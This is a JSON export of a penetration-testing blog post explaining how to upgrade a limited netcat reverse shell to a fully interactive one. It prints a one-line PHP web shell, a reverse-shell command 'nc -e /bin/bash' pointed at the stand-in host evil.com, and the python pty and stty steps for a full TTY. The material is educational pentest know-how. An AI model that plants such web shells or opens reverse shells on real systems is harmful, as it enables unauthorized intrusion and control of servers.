{"id":47609,"date":"2022-09-26T15:11:22","date_gmt":"2022-09-26T13:11:22","guid":{"rendered":"https:\/\/cyberant.com\/netcat-shell-upgraden\/"},"modified":"2023-11-09T13:50:00","modified_gmt":"2023-11-09T12:50:00","slug":"upgrade-netcat-shell","status":"publish","type":"post","link":"https:\/\/cyberant.com\/en\/upgrade-netcat-shell\/","title":{"rendered":"NetCat shell upgrade"},"content":{"rendered":"\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-l8isd9so-965adf5ab8e2e2d25d20fe5442fd599f\">\n#top .av_textblock_section.av-l8isd9so-965adf5ab8e2e2d25d20fe5442fd599f .avia_textblock{\nfont-size:40px;\n}\n<\/style>\n<section  class='av_textblock_section av-l8isd9so-965adf5ab8e2e2d25d20fe5442fd599f '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/BlogPosting\" itemprop=\"blogPost\" ><div class='avia_textblock'  itemprop=\"text\" ><h1 class=\"h2 entry-title\">NetCat shell upgrade<\/h1>\n<\/div><\/section>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-id0fsq-71f74b454ea3c229b9fa94848be5b28f\">\n#top .hr.hr-invisible.av-id0fsq-71f74b454ea3c229b9fa94848be5b28f{\nheight:30px;\n}\n<\/style>\n<div  class='hr av-id0fsq-71f74b454ea3c229b9fa94848be5b28f hr-invisible  avia-builder-el-1  el_after_av_textblock  el_before_av_textblock '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-l8isdymd-45d1ceebdfb2aab3695b17fb0abd6224\">\n#top .av_textblock_section.av-l8isdymd-45d1ceebdfb2aab3695b17fb0abd6224 .avia_textblock{\nfont-size:16px;\n}\n<\/style>\n<section  class='av_textblock_section av-l8isdymd-45d1ceebdfb2aab3695b17fb0abd6224 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/BlogPosting\" itemprop=\"blogPost\" ><div class='avia_textblock'  itemprop=\"text\" ><p>The holy grail during a pen test is a functioning shell. During a pen test, if the hacker managed to take over the server by being able to execute commands on the system, the hacker often sets up a connection to his server. <a href=\"https:\/\/en.wikipedia.org\/wiki\/Netcat\" target=\"_blank\" rel=\"noopener\">NetCat<\/a> is often used for this purpose. NetCat is a tool on Linux systems that allows you to control other programs over the Internet. However, one of the biggest frustrations for hackers is that the shell returned is quite limited. This binary can also be called ncat or nc depending on the system.<\/p>\n<h3>Hacking with NetCat<\/h3>\n<p>Suppose a hacker managed to upload a file called shell.php:  <code><?php system($_GET['cmd']);?><\/code><code><!--?php system($_GET['cmd']);?--><\/code><\/p>\n<p>The hacker opens a port on his own server (evil.com) listening on port 4444. He does this with <code>nc -lvp 4444<\/code>. Now the <code>nc -e \/bin\/bash evil.com 4444<\/code> command is executed on the hacked server. The hacked server will now set up a connection to the hacker&#8217;s server. This is called a reverse tcp shell.<\/p>\n<p><code><br \/>\njohn@Technetium:~$ nc -lvp 4444<br \/>\nListening on [0.0.0.0] (family 0, port 4444)<br \/>\nConnection from [1.2.3.4] port 4444 [tcp\/*] accepted (family 2, sport 54490)<br \/>\nwhoami<br \/>\ncyberant<br \/>\n^C<br \/>\njohn@Technetium:~$ whoami<br \/>\njohn<br \/>\n<\/code><\/p>\n<p>Above is what a hacker will see. When the hacker accidentally enters CTRL-C, the shell is no longer available. Also, commands that require interaction (such as su) do not work.<\/p>\n<h3>How to upgrade a Netcat Shell to an interactive shell?<\/h3>\n<p>The first step needed to improve this is to use Python to start an interactive shell. This can be done with Python&#8217;s PTY module, and works as follows:<\/p>\n<p><code>python -c 'import pty; pty.spawn(\"\/bin\/bash\")'<\/code><\/p>\n<p>The above command produces a semi-interactive shell. That is, it is possible to use commands such as <code>su<\/code> and <code>mysql<\/code>, which ask for a password. The shell still closes itself with CTRL-C, and auto completion via TAB doesn&#8217;t work either. With a few simple commands (and a little magic) it is possible to go to a full shell.<\/p>\n<p>If <code>CTRL-Z<\/code> is run then the shell is moved to the background. It then types (in the local terminal):<code><br \/>\nstty raw -echo<br \/>\nfg<br \/>\n<\/code><\/p>\n<p>The above ensures that there is now a full shell, and can do everything that could be done via SSH, for example. Features such as tab completion and history now work. And VIM through NetCat? Sure!<\/p>\n<div class=\"text-center\">\n<div class=\"post-thumbnail\"><picture><source srcset=\"https:\/\/cyberant.com\/wp-content\/webp-express\/webp-images\/doc-root\/wp-content\/uploads\/2021\/02\/ammonit-321695_640.jpg.webp 634w, https:\/\/cyberant.com\/wp-content\/webp-express\/webp-images\/doc-root\/wp-content\/uploads\/2021\/02\/ammonit-321695_640-297x300.jpg.webp 297w, https:\/\/cyberant.com\/wp-content\/webp-express\/webp-images\/doc-root\/wp-content\/uploads\/2021\/02\/ammonit-321695_640-150x150.jpg.webp 150w\" type=\"image\/webp\" sizes=\"(max-width: 634px) 100vw, 634px\"><\/source><img decoding=\"async\" class=\"attachment-large size-large wp-post-image webpexpress-processed\" src=\"https:\/\/cyberant.com\/wp-content\/uploads\/2021\/02\/ammonit-321695_640.jpg\" sizes=\"(max-width: 634px) 100vw, 634px\" srcset=\"https:\/\/cyberant.com\/wp-content\/uploads\/2021\/02\/ammonit-321695_640.jpg 634w, https:\/\/cyberant.com\/wp-content\/uploads\/2021\/02\/ammonit-321695_640-297x300.jpg 297w, https:\/\/cyberant.com\/wp-content\/uploads\/2021\/02\/ammonit-321695_640-150x150.jpg 150w\" alt=\"reverse tcp shell\" width=\"634\" height=\"640\"><\/picture><\/div>\n<\/div>\n<\/div><\/section>\n<div  class='hr av-11xmy8q-2f99f363bf4509776c1d8ab67c8062e0 hr-default  avia-builder-el-3  el_after_av_textblock  el_before_av_social_share '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n<div  class='av-social-sharing-box av-rj10ey-c236b1adcb113d4dd1ae68b5c536b9e5 av-social-sharing-box-default  avia-builder-el-4  el_after_av_hr  avia-builder-el-last  av-social-sharing-box-fullwidth'><div class=\"av-share-box\"><h5 class='av-share-link-description av-no-toc '>Share this article<\/h5><ul class=\"av-share-box-list noLightbox\"><li class='av-share-link av-social-link-facebook avia_social_iconfont' ><a target=\"_blank\" aria-label=\"Share on Facebook\" href='https:\/\/www.facebook.com\/sharer.php?u=https:\/\/cyberant.com\/en\/upgrade-netcat-shell\/&#038;t=NetCat%20shell%20upgrade' data-av_icon='\ue8f3' data-av_iconfont='entypo-fontello'  title='' data-avia-related-tooltip='Share on Facebook'><span class='avia_hidden_link_text'>Share on Facebook<\/span><\/a><\/li><li class='av-share-link av-social-link-twitter avia_social_iconfont' ><a target=\"_blank\" aria-label=\"Share on X\" href='https:\/\/twitter.com\/share?text=NetCat%20shell%20upgrade&#038;url=https:\/\/cyberant.com\/en\/?p=47609' data-av_icon='\ue932' data-av_iconfont='entypo-fontello'  title='' data-avia-related-tooltip='Share on X'><span class='avia_hidden_link_text'>Share on X<\/span><\/a><\/li><li class='av-share-link av-social-link-whatsapp avia_social_iconfont' ><a target=\"_blank\" aria-label=\"Share on WhatsApp\" href='https:\/\/api.whatsapp.com\/send?text=https:\/\/cyberant.com\/en\/upgrade-netcat-shell\/' data-av_icon='\uf232' data-av_iconfont='entypo-fontello'  title='' data-avia-related-tooltip='Share on WhatsApp'><span class='avia_hidden_link_text'>Share on WhatsApp<\/span><\/a><\/li><li class='av-share-link av-social-link-linkedin avia_social_iconfont' ><a target=\"_blank\" aria-label=\"Share on LinkedIn\" href='https:\/\/linkedin.com\/shareArticle?mini=true&#038;title=NetCat%20shell%20upgrade&#038;url=https:\/\/cyberant.com\/en\/upgrade-netcat-shell\/' data-av_icon='\ue8fc' data-av_iconfont='entypo-fontello'  title='' data-avia-related-tooltip='Share on LinkedIn'><span class='avia_hidden_link_text'>Share on LinkedIn<\/span><\/a><\/li><li class='av-share-link av-social-link-mail avia_social_iconfont' ><a  aria-label=\"Share by Mail\" href='mailto:?subject=NetCat%20shell%20upgrade&#038;body=https:\/\/cyberant.com\/en\/upgrade-netcat-shell\/' data-av_icon='\ue805' data-av_iconfont='entypo-fontello'  title='' data-avia-related-tooltip='Share by Mail'><span class='avia_hidden_link_text'>Share by Mail<\/span><\/a><\/li><\/ul><\/div><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":11,"featured_media":1385,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[195,216],"tags":[182,183,197,190,191,185,186,198,194,188],"class_list":["post-47609","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacken","category-knowledge-base","tag-cyber-security-en","tag-cyberaanval-en","tag-cybercriminelen-en","tag-datalekken-en","tag-etisch-hacker-en","tag-hacker-en","tag-it-infrastructuur-beschermen-en","tag-netcat-shell-upgraden-en","tag-pentest-en","tag-vulnerability-management-en"],"_links":{"self":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts\/47609","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/comments?post=47609"}],"version-history":[{"count":0,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts\/47609\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/media\/1385"}],"wp:attachment":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/media?parent=47609"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/categories?post=47609"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/tags?post=47609"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}